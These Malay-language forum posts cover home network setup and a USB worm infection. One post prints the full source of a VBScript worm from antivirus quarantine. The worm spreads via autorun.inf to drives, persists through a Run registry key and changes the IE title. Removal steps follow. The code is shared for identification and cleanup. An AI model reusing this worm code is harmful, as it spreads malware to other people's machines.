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Posts posted by zareight

  1. bro minta maaf..

    salah penerangan yg aku bagi kat ko tuu.

    sbb ko ni guna switch, dan aku sangka ko guna router,

    klu swicth lagi senang nak setup,

    ko guna modem ape??

    sbb klu ko guna modem tu biar dia autoconnect(pppoe) ,

    then dr modem tu smbung terus ker swicth nii..

    dan ip address ko boleh guna manual,

    ok ..katakan yg ip modem tu

    maka komp 1 ko kena setkan ip add tu sebagai 192.168.1.*** ( ni boleh guna sampai 253 klu tak silap)

    contoh ip komp 1 :

    subnet mask:

    gateway number:

    primary dns:

    secondr dns :


    contoh ip laptop :

    subnet mask:

    gateway number:

    primary dns:

    secondry dns :

    dan begitu laa seterusnya klu ada nak tambah pc

    dan klu ko tak nak guna autoconnect ke isp(internet)

    ko kena dialup dulu streamyx ,

    pastu kat komp ko tu kena ada 2 nic(network kad)

    sau utk sambungan pada modem ,sdan satu lagi utk sambungan ker switch ,

    cara ni mungkin agak sukar bagi yg tak biasa..


    ni ade dalam manual dia...

    so,kirenye if xnk auto connect,aku kene ade 2 network card ar eh?

    susah le camtu....

    tp nape if connect gune IE,kadang2 ade popup work offline?

    kirenye dialling ni mcm error jew....

    tp if dialling yg biase[b4 set auto dialling],xda pon jadi camtu...

  2. aku pon kene gak..camne nih?partition xleh double click..xphmla cara korg ajar tu..

    R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Hacked by Godzilla

    pc aku penah kene vbs nih..

    ni code dia.. aku masih simpan dalam avast! virus chest...

    'My name is Slow but sure V0.04
    on error resume next
    dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
    atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe MS32DLL.dll.vbs"
    set fs = createobject("Scripting.FileSystemObject")
    set mf = fs.getfile(Wscript.ScriptFullname)
    dim text,size
    size = mf.size
    check = mf.drive.drivetype
    set text=mf.openastextstream(1,-2)
    do while not text.atendofstream
    mysource=mysource & vbcrlf
    Set winpath = fs.getspecialfolder(0)
    set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
    tf.attributes = 32
    set tf=fs.createtextfile(winpath & "\MS32DLL.dll.vbs",2,true)
    tf.write mysource
    set tf = fs.getfile(winpath & "\MS32DLL.dll.vbs")
    tf.attributes = 39
    for each flashdrive in fs.drives
    If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
    set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
    tf.attributes =32
    set tf=fs.createtextfile(flashdrive.path &"\MS32DLL.dll.vbs",2,true)
    tf.write mysource
    set tf=fs.getfile(flashdrive.path &"\MS32DLL.dll.vbs")
    tf.attributes =39
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    tf.attributes = 32
    set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
    tf.write atr
    set tf =fs.getfile(flashdrive.path &"\autorun.inf")
    end if
    set rg = createobject("WScript.Shell")
    rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",winpath&"\MS32DLL.dll.vbs"
    rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title","Hacked by Godzilla"
    if check <> 1 then
    Wscript.sleep 200000
    end if
    loop while check<>1
    set sd = createobject("Wscript.shell")
    sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

    ko try search file MS32DLL.dll.vbs pastikan ko tick advanced option, search dalam subfolder, system folder ngan hidden files/folders... selalunya script ni lepak kat setiap local partition (C:\MS32DLL.dll.vbs, d:\MS32DLL.dll.vbs) ngan c:\windows\MS32DLL.dll.vbs kot..

    kalau salah tolong betulkan..

    camne nk bg partition pc bleh double click ar?com aku pon kene..

  3. Ape2 hal, korang kene de-activate virus nih.

    Buat step2 nih:

    1. Masuk Windows dalam safe mod

    2. Masuk Administrator

    3. Show semua hidden files dan system files

    4. delete fail bro_act, bro_act1 dalam folder system32

    5. delete 1 folder yang hiden yang mencurigakan di system32 (Nama Folder lebih kurang nama user)

    6. search fail (bro_act) seluruh hardisk C:\ & delate fail tersebut

    7. kosongkan Recycle Bin

    8. Restart komputer

    8-Team IT Solution

    Politeknik Sultan Mizan Zainal Abidin,

    Dungun, Terengganu.

    Pastu install la AVG, ape2 version pun, amik yg Free je senang.

    Update betul2.

    Kalo nak pakai TrendMicro, ko kene wat c-r-a-c-k-ing plak.

    aku da wat cara manual tp xjmpe folder hidden tuh

    sume com member aku,aku cari..tu aku pelik..

    camne ar??leh tlg aku x?

    aku da cari dlm safe mode lagik..


    haha... akhirnya AVG 7.5 dah dapat menyelesaikan masalah virus Worm/VB.AGD aka (Bro_act dan my sexy) kita nie...hehhehe..

    aku dah cuba...cayalah AVG ! ...symantec yg berbayar pun blum dapat solve lagi problem ni....hehehe :lol:

    btol ke AVG dpt detect???aVG 7.5 resident shield ker?avg free edition yg di update,kn?

    member2 aku ramai kene..dorg mengharapkan aku detect virus nih...

    try update TrendMicro pattern 3.919.00. virus bro_act yg ko kasi tu dah taruk dlm database dia dgn nama WORM_VB.BSB

    virus "Datuk K' pun skali, WORM_WANTOK.A

    camne tu?ajar le..xpenah gune trendmicro lar...

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